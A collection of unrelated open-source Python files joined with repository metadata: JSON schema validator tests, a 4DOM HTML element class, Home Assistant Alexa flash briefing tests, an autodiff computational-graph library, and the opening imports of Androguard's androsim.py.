'arg_optional_no_default': {
'description': 'Foo',
'anyOf': [
{'type': 'string'},
{'type': 'boolean'}
]
},
'arg_optional_no_default_anyof_none': {
'description': 'Foo',
'anyOf': [
{'type': 'string'},
{'type': 'boolean'},
{'type': 'null'}
]
}
}
}
TEST_SCHEMA_5 = {
'additionalProperties': False,
'title': 'foo',
'description': 'Foo.',
'type': 'object',
'properties': {
'arg_optional_default': {
'default': 'bar',
'description': 'Foo',
'oneOf': [
{'type': 'string'},
{'type': 'boolean'}
]
},
'arg_optional_default_none': {
'default': None,
'description': 'Foo',
'oneOf': [
{'type': 'string'},
{'type': 'boolean'}
]
},
'arg_optional_no_default': {
'description': 'Foo',
'oneOf': [
{'type': 'string'},
{'type': 'boolean'}
]
},
'arg_optional_no_default_oneof_none': {
'description': 'Foo',
'oneOf': [
{'type': 'string'},
{'type': 'boolean'},
{'type': 'null'}
]
}
}
}
class JSONSchemaTestCase(TestCase):
def test_use_default_value(self):
# No default, no value provided, should fail
instance = {}
validator = util_schema.get_validator()
expected_msg = '\'arg_required_no_default\' is a required property'
self.assertRaisesRegexp(ValidationError, expected_msg, util_schema.validate,
instance=instance, schema=TEST_SCHEMA_1, cls=validator,
use_default=True)
# No default, value provided
instance = {'arg_required_no_default': 'foo'}
util_schema.validate(instance=instance, schema=TEST_SCHEMA_1, cls=validator,
use_default=True)
# default value provided, no value, should pass
instance = {}
validator = util_schema.get_validator()
util_schema.validate(instance=instance, schema=TEST_SCHEMA_2, cls=validator,
use_default=True)
# default value provided, value provided, should pass
instance = {'arg_required_default': 'foo'}
validator = util_schema.get_validator()
util_schema.validate(instance=instance, schema=TEST_SCHEMA_2, cls=validator,
use_default=True)
def test_allow_default_none(self):
# Let validator take care of default
validator = util_schema.get_validator()
util_schema.validate(instance=dict(), schema=TEST_SCHEMA_3, cls=validator,
use_default=True, allow_default_none=True)
def test_allow_default_explicit_none(self):
# Explicitly pass None to arguments
instance = {
'arg_optional_default': None,
'arg_optional_default_none': None,
'arg_optional_no_default': None
}
validator = util_schema.get_validator()
util_schema.validate(instance=instance, schema=TEST_SCHEMA_3, cls=validator,
use_default=True, allow_default_none=True)
def test_anyof_type_allow_default_none(self):
# Let validator take care of default
validator = util_schema.get_validator()
util_schema.validate(instance=dict(), schema=TEST_SCHEMA_4, cls=validator,
use_default=True, allow_default_none=True)
def test_anyof_allow_default_explicit_none(self):
# Explicitly pass None to arguments
instance = {
'arg_optional_default': None,
'arg_optional_default_none': None,
'arg_optional_no_default': None,
'arg_optional_no_default_anyof_none': None
}
validator = util_schema.get_validator()
util_schema.validate(instance=instance, schema=TEST_SCHEMA_4, cls=validator,
use_default=True, allow_default_none=True)
def test_oneof_type_allow_default_none(self):
# Let validator take care of default
validator = util_schema.get_validator()
util_schema.validate(instance=dict(), schema=TEST_SCHEMA_5, cls=validator,
use_default=True, allow_default_none=True)
def test_oneof_allow_default_explicit_none(self):
# Explicitly pass None to arguments
instance = {
'arg_optional_default': None,
'arg_optional_default_none': None,
'arg_optional_no_default': None,
'arg_optional_no_default_oneof_none': None
}
validator = util_schema.get_validator()
util_schema.validate(instance=instance, schema=TEST_SCHEMA_5, cls=validator,
use_default=True, allow_default_none=True)
def test_is_property_type_single(self):
typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
self.assertTrue(util_schema.is_property_type_single(typed_property))
untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
self.assertTrue(util_schema.is_property_type_single(untyped_property))
multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertFalse(util_schema.is_property_type_single(multi_typed_property))
anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
self.assertFalse(util_schema.is_property_type_single(anyof_property))
oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
self.assertFalse(util_schema.is_property_type_single(oneof_property))
def test_is_property_type_anyof(self):
anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
self.assertTrue(util_schema.is_property_type_anyof(anyof_property))
typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
self.assertFalse(util_schema.is_property_type_anyof(typed_property))
untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
self.assertFalse(util_schema.is_property_type_anyof(untyped_property))
multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertFalse(util_schema.is_property_type_anyof(multi_typed_property))
oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
self.assertFalse(util_schema.is_property_type_anyof(oneof_property))
def test_is_property_type_oneof(self):
oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
self.assertTrue(util_schema.is_property_type_oneof(oneof_property))
typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
self.assertFalse(util_schema.is_property_type_oneof(typed_property))
untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
self.assertFalse(util_schema.is_property_type_oneof(untyped_property))
multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertFalse(util_schema.is_property_type_oneof(multi_typed_property))
anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
self.assertFalse(util_schema.is_property_type_oneof(anyof_property))
def test_is_property_type_list(self):
multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertTrue(util_schema.is_property_type_list(multi_typed_property))
typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
self.assertFalse(util_schema.is_property_type_list(typed_property))
untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
self.assertFalse(util_schema.is_property_type_list(untyped_property))
anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
self.assertFalse(util_schema.is_property_type_list(anyof_property))
oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
self.assertFalse(util_schema.is_property_type_list(oneof_property))
def test_is_property_nullable(self):
multi_typed_prop_nullable = TEST_SCHEMA_1['properties']['arg_optional_multi_type_none']
self.assertTrue(util_schema.is_property_nullable(multi_typed_prop_nullable.get('type')))
anyof_property_nullable = TEST_SCHEMA_4['properties']['arg_optional_no_default_anyof_none']
self.assertTrue(util_schema.is_property_nullable(anyof_property_nullable.get('anyOf')))
oneof_property_nullable = TEST_SCHEMA_5['properties']['arg_optional_no_default_oneof_none']
self.assertTrue(util_schema.is_property_nullable(oneof_property_nullable.get('oneOf')))
typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
self.assertFalse(util_schema.is_property_nullable(typed_property))
multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertFalse(util_schema.is_property_nullable(multi_typed_property.get('type')))
anyof_property = TEST_SCHEMA_4['properties']['arg_optional_no_default']
self.assertFalse(util_schema.is_property_nullable(anyof_property.get('anyOf')))
oneof_property = TEST_SCHEMA_5['properties']['arg_optional_no_default']
self.assertFalse(util_schema.is_property_nullable(oneof_property.get('oneOf')))
def test_is_attribute_type_array(self):
multi_coll_typed_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_collection_type']
self.assertTrue(util_schema.is_attribute_type_array(multi_coll_typed_prop.get('type')))
array_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_array']
self.assertTrue(util_schema.is_attribute_type_array(array_type_property.get('type')))
multi_non_coll_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertFalse(util_schema.is_attribute_type_array(multi_non_coll_prop.get('type')))
object_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_object']
self.assertFalse(util_schema.is_attribute_type_array(object_type_property.get('type')))
def test_is_attribute_type_object(self):
multi_coll_typed_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_collection_type']
self.assertTrue(util_schema.is_attribute_type_object(multi_coll_typed_prop.get('type')))
object_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_object']
self.assertTrue(util_schema.is_attribute_type_object(object_type_property.get('type')))
multi_non_coll_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
self.assertFalse(util_schema.is_attribute_type_object(multi_non_coll_prop.get('type')))
array_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_array']
self.assertFalse(util_schema.is_attribute_type_object(array_type_property.get('type')))
| apache-2.0 |
muadibbm/gini | backend/src/gloader/xml/dom/html/HTMLElement.py | 10 | 3572 | ########################################################################
#
# File Name: HTMLElement.py
#
#
"""
WWW: http://4suite.com/4DOM e-mail: support@4suite.com
Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
from xml.dom.Element import Element
from xml.dom import EMPTY_NAMESPACE, EMPTY_PREFIX
import string
class HTMLElement(Element):
def __init__(self, ownerDocument, nodeName):
tagName = string.upper(nodeName)
Element.__init__(self, ownerDocument, tagName,
EMPTY_NAMESPACE, EMPTY_PREFIX,tagName)
### Attribute Methods ###
def _get_id(self):
return self.getAttribute('ID')
def _set_id(self,ID):
self.setAttribute('ID',ID)
def _get_title(self):
return self.getAttribute('TITLE')
def _set_title(self,title):
self.setAttribute('TITLE',title)
def _get_lang(self):
return self.getAttribute('LANG')
def _set_lang(self,lang):
self.setAttribute('LANG',lang)
def _get_dir(self):
return self.getAttribute('DIR')
def _set_dir(self,dir):
self.setAttribute('DIR',dir)
def _get_className(self):
return self.getAttribute('CLASSNAME')
def _set_className(self,className):
self.setAttribute('CLASSNAME',className)
### Overridden Methods ###
def getAttribute(self, name):
attr = self.attributes.getNamedItem(string.upper(name))
return attr and attr.value or ''
def getAttributeNode(self, name):
return self.attributes.getNamedItem(string.upper(name))
def getElementsByTagName(self, tagName):
return Element.getElementsByTagName(self, string.upper(tagName))
def hasAttribute(self, name):
return self.attributes.getNamedItem(string.upper(name)) is not None
def removeAttribute(self, name):
attr = self.attributes.getNamedItem(string.upper(name))
attr and self.removeAttributeNode(attr)
def setAttribute(self, name, value):
Element.setAttribute(self, string.upper(name), value)
def _4dom_validateString(self, value):
return value
### Helper Functions For Cloning ###
def _4dom_clone(self, owner):
e = self.__class__(owner,
self.tagName)
for attr in self.attributes:
clone = attr._4dom_clone(owner)
if clone.localName is None:
e.attributes.setNamedItem(clone)
else:
e.attributes.setNamedItemNS(clone)
clone._4dom_setOwnerElement(self)
return e
def __getinitargs__(self):
return (self.ownerDocument,
self.tagName
)
### Attribute Access Mappings ###
_readComputedAttrs = Element._readComputedAttrs.copy()
_readComputedAttrs.update ({
'id' : _get_id,
'title' : _get_title,
'lang' : _get_lang,
'dir' : _get_dir,
'className' : _get_className,
})
_writeComputedAttrs = Element._writeComputedAttrs.copy()
_writeComputedAttrs.update ({
'id' : _set_id,
'title' : _set_title,
'lang' : _set_lang,
'dir' : _set_dir,
'className' : _set_className,
})
_readOnlyAttrs = filter(lambda k,m=_writeComputedAttrs: not m.has_key(k),
Element._readOnlyAttrs + _readComputedAttrs.keys())
| mit |
qedi-r/home-assistant | tests/components/alexa/test_flash_briefings.py | 4 | 3680 | """The tests for the Alexa component."""
# pylint: disable=protected-access
import asyncio
import datetime
import pytest
from homeassistant.core import callback
from homeassistant.setup import async_setup_component
from homeassistant.components import alexa
from homeassistant.components.alexa import const
SESSION_ID = "amzn1.echo-api.session.0000000-0000-0000-0000-00000000000"
APPLICATION_ID = "amzn1.echo-sdk-ams.app.000000-d0ed-0000-ad00-000000d00ebe"
REQUEST_ID = "amzn1.echo-api.request.0000000-0000-0000-0000-00000000000"
# pylint: disable=invalid-name
calls = []
NPR_NEWS_MP3_URL = "https://pd.npr.org/anon.npr-mp3/npr/news/newscast.mp3"
@pytest.fixture
def alexa_client(loop, hass, hass_client):
"""Initialize a Home Assistant server for testing this module."""
@callback
def mock_service(call):
calls.append(call)
hass.services.async_register("test", "alexa", mock_service)
assert loop.run_until_complete(
async_setup_component(
hass,
alexa.DOMAIN,
{
# Key is here to verify we allow other keys in config too
"homeassistant": {},
"alexa": {
"flash_briefings": {
"weather": [
{
"title": "Weekly forecast",
"text": "This week it will be sunny.",
},
{
"title": "Current conditions",
"text": "Currently it is 80 degrees fahrenheit.",
},
],
"news_audio": {
"title": "NPR",
"audio": NPR_NEWS_MP3_URL,
"display_url": "https://npr.org",
"uid": "uuid",
},
}
},
},
)
)
return loop.run_until_complete(hass_client())
def _flash_briefing_req(client, briefing_id):
return client.get("/api/alexa/flash_briefings/{}".format(briefing_id))
@asyncio.coroutine
def test_flash_briefing_invalid_id(alexa_client):
"""Test an invalid Flash Briefing ID."""
req = yield from _flash_briefing_req(alexa_client, 10000)
assert req.status == 404
text = yield from req.text()
assert text == ""
@asyncio.coroutine
def test_flash_briefing_date_from_str(alexa_client):
"""Test the response has a valid date parsed from string."""
req = yield from _flash_briefing_req(alexa_client, "weather")
assert req.status == 200
data = yield from req.json()
assert isinstance(
datetime.datetime.strptime(
data[0].get(const.ATTR_UPDATE_DATE), const.DATE_FORMAT
),
datetime.datetime,
)
@asyncio.coroutine
def test_flash_briefing_valid(alexa_client):
"""Test the response is valid."""
data = [
{
"titleText": "NPR",
"redirectionURL": "https://npr.org",
"streamUrl": NPR_NEWS_MP3_URL,
"mainText": "",
"uid": "uuid",
"updateDate": "2016-10-10T19:51:42.0Z",
}
]
req = yield from _flash_briefing_req(alexa_client, "news_audio")
assert req.status == 200
json = yield from req.json()
assert isinstance(
datetime.datetime.strptime(
json[0].get(const.ATTR_UPDATE_DATE), const.DATE_FORMAT
),
datetime.datetime,
)
json[0].pop(const.ATTR_UPDATE_DATE)
data[0].pop(const.ATTR_UPDATE_DATE)
assert json == data
| apache-2.0 |
upul/Aurora | aurora/autodiff/autodiff.py | 1 | 21346 | import numpy as np
try:
from aurora.ndarray import gpu_op, ndarray
except ImportError:
pass
class Node(object):
""" Node object represents a node in the computational graph"""
def __init__(self):
""" New node will be created by Op objects __call__ method"""
# list of inputs to this node
self.inputs = []
# operator
self.op = None
# constants
self.const = None
# name of the node mainly use for debugging
self.name = ""
def __add__(self, other):
""" Adding two nodes and returns a new node"""
if isinstance(other, Node):
return add(self, other)
else:
return add_const(self, other)
def __sub__(self, other):
if isinstance(other, Node):
return sub(self, other)
else:
return sub_const(self, other)
def __rsub__(self, other):
return ref_sub_const(self, other)
def __mul__(self, other):
if isinstance(other, Node):
return mul(self, other)
else:
return mul_const(self, other)
def __truediv__(self, other):
if isinstance(other, Node):
return div(self, other)
else:
return div_const(self, other)
# Allow left-hand-side add and multiply.
__radd__ = __add__
__rmul__ = __mul__
__rdiv__ = __truediv__
class Op(object):
""" Op class represents operations perform on nodes"""
def __call__(self):
"""
Create a new node which represents operations perform on the graph
Parameters
----------
None
Returns
-------
Node
The new node object
"""
new_node = Node()
new_node.op = self
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
"""
Given the values of input nodes, compute the output value
Parameters
----------
:type use_numpy: object
:param use_numpy:
:param node: Node that performs the computation
:param input_vals: Values of input node
Returns
-------
:return: The output value of the node
"""
raise NotImplementedError
def gradient(self, node, output_grads):
"""
Given the value of output gradients this operation calculate the
gradient contribution of each input node
Parameters
----------
:param node:
:param output_grads:
Returns
-------
:return: A list of gradient contribution to each input node respectively
"""
raise NotImplementedError
def infer_shape(self, node, input_shapes):
raise NotImplementedError
class AddOp(Op):
"""
"""
def __call__(self, nodeA, nodeB):
"""
This Operator element-wise two nodes
Parameters
----------
:param nodeA: LHS operand
:param nodeB: RHS operand
Returns
-------
:return: A new Node which represents the element-wise plus operation
"""
new_node = Op.__call__(self)
new_node.inputs = [nodeA, nodeB]
new_node.name = '({}+{})'.format(nodeA.name, nodeB.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
"""
Given values of two input nodes, return result of element-wise addition.
Parameters
----------
:param node:
:param input_vals: List of two input nodes
Returens
--------
:return: The result of the element-wise addition operation
"""
assert len(input_vals) == 2
# return input_vals[0] + input_vals[1]
if use_numpy:
output_val[:] = input_vals[0] + input_vals[1]
else:
if input_vals[0].shape == input_vals[1].shape:
gpu_op.matrix_elementwise_add(input_vals[0], input_vals[1], output_val)
elif input_vals[0].shape == (1,):
const = input_vals[0].asnumpy()[0] # TODO: (upul) do we need this ? check it?
gpu_op.matrix_elementwise_add_by_const(input_vals[1], const, output_val)
elif input_vals[1].shape == (1,):
const = input_vals[1].asnumpy()[1] # TODO: (upul) do we need this ? check it?
gpu_op.matrix_elementwise_add_by_const(input_vals[0], const, output_val)
else:
pass # TODO: (upul) handle input[0] and input[1] in different shapes
def gradient(self, node, output_grads):
"""
Given the values of output gradients, calculate the gradients of input nodes
Parameters
----------
:param node:
:param output_grads: Gradient contribution of output nodes
Returns
-------
:return: A list of gradient contribution of output nodes
"""
return [output_grads, output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
assert input_shapes[0] == input_shapes[1]
return input_shapes[0]
class AddByConstOp(Op):
"""
Operator represents the element-wise addition of a node and a const
"""
def __call__(self, node_A, const_val):
"""
:param node:
:param const_val:
:return:
"""
new_node = Op.__call__(self)
new_node.const = const_val
new_node.inputs = [node_A]
new_node.name = '({0:s}+{1:f})'.format(node_A.name, const_val)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
"""
:param node:
:param input_vals:
:return:
"""
assert len(input_vals) == 1
if use_numpy:
output_val[:] = node.const + input_vals[0]
else:
gpu_op.matrix_elementwise_add_by_const(
input_vals[0], node.const, output_val)
def gradient(self, node, output_grads):
"""
:param node:
:param output_grads:
:return:
"""
return [output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
# assert node.const.shape == input_shapes[0]
return input_shapes[0]
class SubOp(Op):
def __call__(self, node_A, node_B):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.name = '({0:s}-{1:s})'.format(node_A.name, node_B.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
if use_numpy:
output_val[:] = input_vals[0] - input_vals[1]
else:
gpu_op.matrix_elementwise_subtract(input_vals[0], input_vals[1], output_val)
def gradient(self, node, output_grads):
return [output_grads, -1 * output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
assert input_shapes[0] == input_shapes[1]
return input_shapes[0]
class SubByConstOp(Op):
def __call__(self, node_A, const_val):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.const = const_val
new_node.name = '({0:s}-{1:f})'.format(node_A.name, const_val)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
if use_numpy:
output_val[:] = input_vals[0] - node.const
else:
gpu_op.matrix_elementwise_subtract_by_const(input_vals[0], node.const, output_val)
def gradient(self, node, output_grads):
return [output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
class ReflectedSubByConstOp(Op):
def __call__(self, node_A, const_val):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.const = const_val
new_node.name = '({0:f}-{1:s})'.format(const_val, node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
return node.const - input_vals[0]
def gradient(self, node, output_grads):
return [-1 * output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
class OnesLikeOp(Op):
def __call__(self, node_A):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.name = 'Oneslike({})'.format(node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
if use_numpy:
assert isinstance(input_vals[0], np.ndarray)
output_val[:] = np.ones(input_vals[0].shape)
else:
gpu_op.array_set(output_val, 1)
def gradient(self, node, output_grads):
return [zeros_like(node.inputs[0])]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
if input_shapes[0] == 1: # TODO (upul) do we need this if ?
return (1,)
else:
return input_shapes[0]
class ZerosLikeOp(Op):
def __call__(self, node_A):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.name = 'Zeroslike({})'.format(node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
if use_numpy:
assert isinstance(input_vals[0], np.ndarray)
output_val[:] = np.zeros(input_vals[0].shape)
else:
gpu_op.array_set(output_val, 0)
def gradient(self, node, output_grads):
return [zeros_like(node.inputs[0])]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
if input_shapes[0] == 1: # TODO (upul) do we need this if ?
return (1,)
else:
return input_shapes[0]
class ReshapeOp(Op):
def __call__(self, node_A, newshape):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.newshape = newshape
new_node.name = 'Reshape({})'.format(node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
if use_numpy:
assert isinstance(input_vals[0], np.ndarray)
output_val[:] = np.reshape(input_vals[0], newshape=node.newshape)
else:
# TODO: (upul) changing share is not an expensive operation. But looks
# : bit ugly. Can't we find out an alternative approach?
input_shape = input_vals[0].shape
ndarray.reshape(output_val, input_shape)
input_vals[0].copyto(output_val)
ndarray.reshape(output_val, node.newshape)
def gradient(self, node, output_grads):
return [reshape_grad(node.inputs[0], output_grads)]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
return node.newshape
class ReshapeGradientOp(Op):
def __call__(self, node_A, node_B):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.name = 'ReshapeGradientOp({0:s})'.format(node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
if use_numpy:
output_val[:] = input_vals[1].reshape(input_vals[0].shape)
else:
# TODO: (upul) changing share is not an expensive operation. But looks
# : bit ugly. Can't we find out an alternative approach?
ndarray.reshape(output_val, input_vals[0].shape)
input_vals[1].copyto(output_val)
def gradient(self, node, output_grads):
raise NotImplementedError('Gradient of ReshapeGradientOp not supported')
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
return input_shapes[0]
class MulOp(Op):
def __call__(self, node_A, node_B):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.name = '({0:s}*{1:s})'.format(node_A.name, node_B.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
if use_numpy:
output_val[:] = input_vals[0] * input_vals[1]
else:
ip_1_shape = input_vals[0].shape
ip_2_shape = input_vals[1].shape
if ip_1_shape == ip_2_shape:
gpu_op.matrix_elementwise_multiply(input_vals[0], input_vals[1], output_val)
elif ip_1_shape == (1,):
const_val = input_vals[0].asnumpy()[0]
gpu_op.matrix_elementwise_multiply_by_const(input_vals[1], const_val, output_val)
elif ip_2_shape == (1,):
const_val = input_vals[1].asnumpy()[0]
gpu_op.matrix_elementwise_multiply_by_const(input_vals[0], const_val, output_val)
else:
pass # TODO (upul) handle ip_1_shape != ip_2_shape
def gradient(self, node, output_grads):
return [node.inputs[1] * output_grads, node.inputs[0] * output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
if input_shapes[0] == (1,):
return input_shapes[1]
elif input_shapes[1] == (1,):
return input_shapes[0]
elif input_shapes[0] == input_shapes[1]:
return input_shapes[0]
else:
stmt = 'Invalid dimensions {0:s}, (1:s)'.format(input_shapes[0], input_shapes[1])
raise RuntimeError(stmt)
class MulByConstOp(Op):
def __call__(self, node_A, const_val):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.const = const_val
new_node.name = '({0:s}*{1:f})'.format(node_A.name, const_val)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
if use_numpy:
output_val[:] = node.const * input_vals[0]
else:
gpu_op.matrix_elementwise_multiply_by_const(
input_vals[0], node.const, output_val)
def gradient(self, node, output_grads):
return [node.const * output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
class DivOp(Op):
def __call__(self, node_A, node_B):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.name = '({0:s}/{1:s})'.format(node_A.name, node_B.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
if use_numpy:
output_val[:] = input_vals[0] / input_vals[1]
else:
gpu_op.matrix_elementwise_division(input_vals[0], input_vals[1], output_val)
def gradient(self, node, output_grads):
grad_A = output_grads / node.inputs[1]
grad_B = -1.0 * output_grads * node.inputs[0] / (node.inputs[1] * node.inputs[1])
return [grad_A, grad_B]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
assert input_shapes[0] == input_shapes[1]
return input_shapes[0]
class DivByConstOp(Op):
def __call__(self, node_A, const_val):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.const = const_val
new_node.name = '({0:s}/{1:f})'.format(node_A.name, const_val)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 1
if use_numpy:
output_val[:] = input_vals[0] / node.const
else:
gpu_op.matrix_elementwise_div_by_const(input_vals[0], node.const, output_val)
def gradient(self, node, output_grads):
return [output_grads / node.const]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
class PlaceholderOp(Op):
"""Op to feed value to a nodes."""
def __call__(self):
"""Creates a variable node."""
new_node = Op.__call__(self)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
"""No compute function since node value is fed directly in Executor."""
assert False, "placeholder values provided by feed_dict"
def gradient(self, node, output_grad):
"""No gradient function since node has no inputs."""
return None
class ReduceSumOp(Op):
"""
"""
def __call__(self, node_A):
new_node = Op.__call__(self)
new_node.inputs = [node_A]
new_node.name = 'ReduceSum({0:s})'.format(node_A.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
"""
:param node:
:param input_vals:
:param output_val:
:param use_numpy:
:return:
"""
assert len(input_vals) == 1
if use_numpy:
assert isinstance(output_val, np.ndarray)
output_val[:] = np.sum(input_vals[0], axis=0)
else:
gpu_op.reduce_sum_axis_zero(input_vals[0], output_val)
def gradient(self, node, output_grads):
return [output_grads]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 1
if len(input_shapes[0]) == 1:
return (1,)
else:
return tuple(input_shapes[0][i]
for i in range(1, len(input_shapes[0])))
class BroadcastToOp(Op):
def __call__(self, node_A, node_B):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.name = 'BroadcastTo({0:s}, {1:s}.shape)'.format(node_A.name, node_B.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
if use_numpy:
output_val[:] = np.broadcast_to(input_vals[0], input_vals[1].shape)
else:
gpu_op.broadcast_to(input_vals[0], output_val)
def gradient(self, node, output_grads):
grad_A = reduce_sum(output_grads)
grad_B = zeros_like(node.inputs[1])
return [grad_A, grad_B]
def infer_shape(self, node, input_shapes):
assert len(input_shapes) == 2
return input_shapes[1]
class MatMulOp(Op): # TODO: (upul) double check what this class is doing
def __call__(self, node_A, node_B, trans_A=False, trans_B=False):
new_node = Op.__call__(self)
new_node.inputs = [node_A, node_B]
new_node.trans_A = trans_A
new_node.trans_B = trans_B
new_node.name = 'MatMul({0:s}, {1:s}'.format(node_A.name, node_B.name)
return new_node
def compute(self, node, input_vals, output_val, use_numpy=True):
assert len(input_vals) == 2
if use_numpy:
if node.trans_A:
input_vals[0] = input_vals[0].T
if node.trans_B:
input_vals[1] = input_vals[1].T
output_val[:] = np.dot(input_vals[0], input_vals[1])
else:
gpu_op.matrix_multiply(
input_vals[0], node.trans_A,
input_vals[1], node.trans_B,
output_val)
def gradient(self, node, output_grads):
grad_A = matmul(output_grads, node.inputs[1], trans_A=False, trans_B=True)
grad_B = matmul(node.inputs[0], output_grads, trans_A=True, trans_B=False)
return [grad_A, grad_B]
def infer_shape(self, node, input_shapes):
"""Need to handle input_vals[0].shape != input_vals[1].shape"""
assert len(input_shapes) == 2
(row_A, col_A) = input_shapes[0]
if node.trans_A:
row_A, col_A = col_A, row_A
(row_B, col_B) = input_shapes[1]
if node.trans_B:
row_B, col_B = col_B, row_B
assert col_A == row_B
return (row_A, col_B)
def Variable(name):
"""User defined variables in an expression.
e.g. x = Variable(name = "x")
"""
placeholder_node = placeholder()
placeholder_node.name = name
return placeholder_node
def Parameter(name, init):
"""
example: w = Parameter(name='w', state=...)
:param name:
:param init:
:return:
"""
parameter_node = placeholder()
parameter_node.name = name
parameter_node.const = init
return parameter_node
# Global singleton operations
add = AddOp()
add_const = AddByConstOp()
sub = SubOp()
sub_const = SubByConstOp()
ref_sub_const = ReflectedSubByConstOp()
mul = MulOp()
mul_const = MulByConstOp()
div = DivOp()
div_const = DivByConstOp()
zeros_like = ZerosLikeOp()
ones_like = OnesLikeOp()
reduce_sum = ReduceSumOp()
broadcast_to = BroadcastToOp()
reshape = ReshapeOp()
reshape_grad = ReshapeGradientOp()
matmul = MatMulOp()
placeholder = PlaceholderOp()
| apache-2.0 |
andymg/androguard | androsim.py | 38 | 8073 | #!/usr/bin/env python
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import sys, os
from optparse import OptionParser
from androguard.core import androconf
from androguard.core.bytecodes import apk, dvm
from androguard.core.analysis import analysis
sys.path.append("./elsim")
from elsim import elsim
from elsim.elsim_dalvik import ProxyDalvik, FILTERS_DALVIK_SIM
